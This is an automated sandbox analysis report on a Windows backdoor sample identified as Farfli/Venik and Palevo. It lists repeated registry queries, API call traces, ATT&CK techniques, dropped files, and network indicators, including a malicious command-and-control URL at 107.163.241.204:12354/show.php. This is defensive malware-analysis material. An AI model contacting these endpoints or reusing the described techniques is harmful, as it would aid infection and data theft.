Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\XgijTrY6No.exe; Code function: 0_2_0040229F _EH_prolog,EnterCriticalSection,#540,SendMessageA,#3998,#6907,#6907,#2818,#6907,GetSystemTime,#2818,#6907,#6007,#823,#823,memcpy,#6007,LeaveCriticalSection,#800,0_2_0040229F
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_10006C40 Sleep,GetVersionExA,CreateThread,sprintf,6_2_10006C40

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe; Device IO: \Device\Harddisk0\DR0
Source: C:\Users\user\Desktop\XgijTrY6No.exe; Code function: 0_2_0040271C socket,gethostname,gethostbyname,htons,memcpy,bind,setsockopt,setsockopt,setsockopt,WSAIoctl,WSAGetLastError,CreateThread,closesocket,0_2_0040271C
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe; Code function: 5_2_0040271C socket,gethostname,gethostbyname,htons,memcpy,bind,setsockopt,LdrInitializeThunk,LdrInitializeThunk,setsockopt,LdrInitializeThunk,setsockopt,LdrInitializeThunk,WSAIoctl,WSAGetLastError,CreateThread,closesocket,5_2_0040271C
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_100055E0 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,Sleep,wsprintfA,malloc,htons,htons,htons,htons,htons,htons,htons,inet_addr,closesocket,closesocket,closesocket,6_2_100055E0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 3 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Bootkit | 111 Process Injection | 2 Software Packing | Security Account Manager | 124 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 11 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior graph] Behavior Graph ID: 1573195; Sample: XgijTrY6No.exe; Startdate: 11/12/2024; Architecture: WINDOWS; Score: 100

Source | Detection | Scanner | Label | Link
XgijTrY6No.exe | 89% | ReversingLabs | Win32.Backdoor.Venik | -
XgijTrY6No.exe | 100% | Avira | TR/Farfli.ltgad | -
XgijTrY6No.exe | 100% | Joe Sandbox ML | - | -

Source | Detection | Scanner | Label | Link
C:\ftelcs\rjqzr.dll | 100% | Avira | TR/Patched.Ren.Gen | -
C:\Users\user\AppData\Local\Temp\mszcy.exe | 100% | Avira | TR/Farfli.ltgad | -
C:\ftelcs\rjqzr.dll | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\Temp\mszcy.exe | 100% | Joe Sandbox ML | - | -
C:\ftelcs\rjqzr.dll | 68% | ReversingLabs | Win32.Worm.Palevo | -
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high
blogx.sina.com.cn | 202.108.0.52 | true | false | - | high
krnaver.com | unknown | unknown | true | - | unknown
blog.sina.com.cn | unknown | unknown | false | - | high

Name | Malicious | Antivirus Detection | Reputation
http://107.163.241.204:12354/show.php | true | Avira URL Cloud: safe | unknown
https://blog.sina.com.cn/u/5655029807 | false | - | high
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://107.163.241.204:12354/show.phphrundll32.exe, 00000006.00000003.2423080539.0000000005B33000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://107.163.24Irundll32.exe, 00000006.00000002.3807350725.0000000004EEB000.00000004.00000010.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://107.163.241.204:12354/show.php)rundll32.exe, 00000006.00000002.3807350725.0000000004EEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3808953016.0000000004F6D000.00000004.00000010.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://blog.sina.com.cn/u/5655029807Irundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://107.163.241.204:12354/show.php#rundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://107.163.241.204:12354/show.phpcrundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://blog.sina.com.cn/u/5655029807Arundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://107.163.241.204:12354/show.php%rundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://blog.sina.com.cn/u/5655029807Brundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://blog.sina.com.cn/rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://107.163.241.204:12354/show.phpgrundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                                      202.108.0.52 | blogx.sina.com.cn | China | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | false
                                                      107.163.241.204 | unknown | United States | 20248 | TAKE2US | true
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1573195
                                                      Start date and time:2024-12-11 16:22:51 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 37s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:20
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
